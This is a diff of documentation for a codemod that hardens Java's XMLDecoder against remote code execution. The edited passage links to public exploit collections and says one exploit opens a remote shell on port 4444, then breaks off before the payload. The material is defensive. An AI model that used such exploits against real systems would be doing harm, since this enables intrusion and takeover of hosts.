pixee/docs/docs/codemods/java/pixee_java_harden-xmldecoder-stream.md

 This codemod hardens usage of Java's [`java.beans.XMLDecoder`](https://docs.oracle.com/en/java/javase/17/docs/api/java.desktop/java/beans/XMLDecoder.html) APIs to prevent remote code execution attacks.

 The `XMLDecoder` type is meant to serialize Java beans to and from XML.
 It has a lot of power built into it, so it is not meant for use with untrusted data.
-If attackers can influence the XML being deserialized, they can execute arbitrary system commands with exploits [like this](https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/web/java-XMLDecoder-RCE.md) (and you can find [many others](https://github.com/pwntester/XMLDecoder):
+If attackers can influence the XML being deserialized, they can execute arbitrary system commands with exploits [like this](https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/web/java-XMLDecoder-RCE.md) one, which causes the host to open a remote shell on port 4444:

 ```xml
 <?xml version="1.0" encoding="UTF-8"?>